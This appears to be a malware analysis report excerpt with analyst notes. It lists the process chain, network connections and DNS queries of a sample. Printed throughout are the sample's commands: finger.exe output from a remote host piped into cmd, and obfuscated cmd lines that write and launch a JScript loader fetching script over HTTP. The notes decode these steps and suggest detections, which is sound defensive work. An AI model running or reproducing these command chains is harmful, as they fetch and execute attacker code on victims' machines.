Technical Information
- '<SYSTEM32>\finger.exe' ok@wea96.bombeirosgov.xyz
- '<SYSTEM32>\more.com' +2
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\7hk.js"
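- C:\users\public\7hk.js
  Note: this is the file that the `sEt/p ... 1>C:\Users\Public\7hk%LSQX%s` command further down writes (LSQX is set to `.j`), and the same file that wscript.exe is launched on.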
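- 'we###.#ombeirosgov.xyz':79
  Note: port 79 is the Finger protocol port, consistent with the finger.exe invocation listed above. Outbound connections on this port from a workstation are uncommon and worth alerting on.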
- 'et####.qeiouyftoyj.date':80
- 'we###.#ombeirosgov.xyz':79
- DNS ASK we###.#ombeirosgov.xyz
- DNS ASK et####.qeiouyftoyj.date
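- '<SYSTEM32>\cmd.exe' /c finger.exe ok@wea96.bombeirosgov.xyz |more +2 |cmd
  Note: the text returned by the remote Finger server is piped through `more +2`, which skips the first two lines of output, and then into cmd, so whatever the server returns is executed as commands. A finger.exe process whose output feeds cmd.exe is a useful process-chain detection.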
- '<SYSTEM32>\cmd.exe'
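- '<SYSTEM32>\cmd.exe' /V/D/c "Set LSQX=.j&&sET AZTGJ=vsGT3arsGT3 a =sGT3 'scsGT3risGT3ptsGT3:'; b =sGT3 'hsGT3TtPsGT3:'; GsGT3etsGT3ObjsGT3ecsGT3t(sGT3a+b+'&&sET YU2L=SESUTSESUTetaefj.qeiouyftoyj.dateSESUT?1SESUT')&...
  Note: the command line is cut off at `&...` in this listing. The visible part sets three variables: LSQX holds `.j`, and AZTGJ and YU2L hold JScript text padded with the filler tokens `sGT3` and `SESUT`. The `%AZTGJ:sGT3=%%YU2L:SESUT=/%` expansion in the following command removes `sGT3` and replaces `SESUT` with `/`. The result is a `GetObject` call on a `script:` + `hTtP:` moniker pointing at the qeiouyftoyj.date host, which would load script content from that host over HTTP.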
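- '<SYSTEM32>\cmd.exe' /S /D /c" sEt/p 6LWA4="%AZTGJ:sGT3=%%YU2L:SESUT=/%" 0<nul 1>C:\Users\Public\7hk%LSQX%s"
  Note: `set /p` with input taken from nul prints the expanded prompt string to standard output without waiting, and `1>` redirects it to a file. With LSQX set to `.j` by the preceding command, `7hk%LSQX%s` resolves to `7hk.js`. The script is therefore written to disk by cmd.exe itself, with no separate download or file-copy step to observe.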
- '<SYSTEM32>\cmd.exe' /S /D /c" start cmd /c start C:\Users\Public\7hk%LSQX%s "
- '<SYSTEM32>\cmd.exe' /c start C:\Users\Public\7hk.js